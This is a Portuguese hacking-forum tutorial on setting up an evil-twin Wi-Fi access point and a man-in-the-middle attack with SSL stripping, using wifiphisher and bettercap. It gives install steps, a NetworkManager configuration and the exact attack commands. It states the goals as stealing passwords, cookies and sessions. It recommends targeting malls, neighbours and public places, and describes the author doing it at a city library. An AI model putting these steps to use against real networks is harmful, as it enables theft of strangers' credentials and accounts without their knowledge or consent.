Evil-Twin + MiTM com SSLStrip

#1
Eai galera do mal, sou novo no fórum, esse é meu primeiro tuto mas vou passar um pouco do pouco que sei com vocês... :)

Hoje vamos realizar um Evil-Twin e lançar um MiTM pra fazer uns credential harvesting, cookies harvesting pros session hijacking, e os caralhos a 4.... kkk

Organizei este tópico da seguinte forma:
  1. Introdução
  2. Instalação
  3. Configuração
  4. Attack Scenario
  5. Extra
Requerimentos*
- Adaptador Wireless extra que suporte modo monitor
- AP próximo com conexão a internet para ser nosso provedor de internet

Então let's hack the gibson!!!

1 - Introdução

Eu não vou falar o que é um MiTM, Evil-Twin, Arp Spoofing, SSLStripping e etc.. porque vai deixar o tópico muito grande e também são coisas que ja estão muito bem documentadas, entao eu não preciso reenvientar a roda, você que tem que largar de preguiça e ir pesquisar. :D kk
Simplesmente vamos criar um ponto de acesso falso (Fake AP) e fazer um ataque man in the middle na rede usando o sslstrip e aguardar algum cliente conectar. Com este ataque é possivel capturar senhas de redes sociais, e-mails entre outros.
As variedades de opções de onde você pode aplicar este ataque realmente são muitas, seu limite é sua criatividade e conhecimento, pense fora da caixa, lembre-se disso!



2 - Instalação

As ferramentas usadas vão ser essas:
Bettercap ( Github - https://github.com/evilsocket/bettercap )
Wifiphisher ( Github - https://github.com/wifiphisher/wifiphisher )

Instalando Wifiphisher:

Code: Select all

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install


Instalando Bettercap

Dependências:

Code: Select all

sudo apt-get install build-essential ruby-dev libpcap-dev
O Kali-Linux possui o bettercap no repositório então é simples:

Code: Select all

sudo apt-get install bettercap
Ou você pode usar o comando 'gem' para instalar

Code: Select all

gem install bettercap
Feito isso tudo deve estar instalado com sucesso. ;)

3 - Configuração

Quando você conectar seu adaptador wireless no pc o NetworkManager automaticamente vai gerenciar ele, e quando ele faz isso impossibilita o wifiphisher de usar a interface, o que pode ocasionar no erro
[!] Interface "wlan2" is controlled by NetworkManager.You need to manually set the devices that should be ignored by NetworkManager using the keyfile plugin (unmanaged-directive).
Para resolver vamos alterar o arquivo /etc/NetworkManager/NetworkManager.conf
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=false
Adicionando a seguinte linha
[keyfile]
unmanaged-devices=interface-name:wlan2
Assim o arquivo ficara desta forma:
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=false

[keyfile]
unmanaged-devices=interface-name:wlan2
Agora reinicie o serviço

Code: Select all

sudo service network-manager restart
Pronto nosso wireless card ta configurado.

Agora vamos entender os parametros que vamos passar nas tools

Wifiphisher
-e <ESSID> | Nome do AP que vamos criar
-aI <Interface> | Interface que vamos usar para criar o ponto de acesso ( Ex: wlan2 )
-iI <Interface< | Interface que vai fornecer a conexão com a internet
-pK <Password> | Password para o AP (Apenas se necessário)
-iAM <MAC> | MAC do AP

Bettercap
--proxy | Habilita o proxy HTTP e redireciona todo o trafego para ele
--log <File> | Arquivo de logs
-I <Interface> | interface para realizar o sniffing

Simples não é? nada complicado até agora, então vamos ao que interessa...

4 - Attack Scenario


Foi encontrado um lugar onde tem um AP proximo com internet disponivel para usarmos no evil-twin.
Nosso adaptador foi conectado ao pc, e depois configurado para não ser gerenciado pelo NetworkManager.
As ferramentas wifiphisher e bettercap estão instaladas e funcionando
Hora de atacar!


Criando o Evil-Twin com acesso a internet usando o wifiphisher

Code: Select all

sudo wifiphisher -e "Free Wi-Fi" -aI wlan2 -iI wlan1 -iAM ff:ff:ff:ff:ff:ff
Será criado um ponto de acesso com o ESSID "Free Wi-Fi" que possui acesso a internet


Lançando o MiTM com sslstrip atravez do bettercap

Code: Select all

sudo bettercap --proxy -I wlan2 --log BETTERCAP_SNIFF.log
Isso é tudo que precisa ser feito, duas simples linhas de comando e você tem um evil-twin com internet e um sniffer pra pegar conexões ssl
Uma boa dica seria usar o wireshark pra capturar os pacotes também pois da pra salvar num formato mais agradavel e investigar melhor depois.

5 - Extras

Bom agora que você ja sabe como realizar o ataque vem a pergunta, aonde realizar o ataque? As possibilidades realmente são praticamente infinitas mas existem alguns lugares comuns onde você pode ter mais facilidade em fazer, por exemplo você pode ir em algum local publico movimentado e fazer la, no shopping, ou na sua casa quando o vizinho faz festa.... kk :p

Um exemplo real que eu fiz só pra testar foi na biblioteca da cidade, la são vários andares e cada andar possui um AP aberto com o essid 'Biblioteca', conectei ao wifi aberto com o wirelress card 1(wlan1) e criei meu Evil-Twin com o essid 'Biblioteca' no wireless card 2 (wlan2) e liguei o sniffer , depois nem preciso dizer neh... :D


Bom galera espero que tenham gostado, qualquer duvida estou disposto a responder só postar, esse é só o primeiro de muitos tutos que ainda vou fazer.. Na medida que vou aprendendo também vou ensinando. Eh nois TheCybers :D
1 x
cron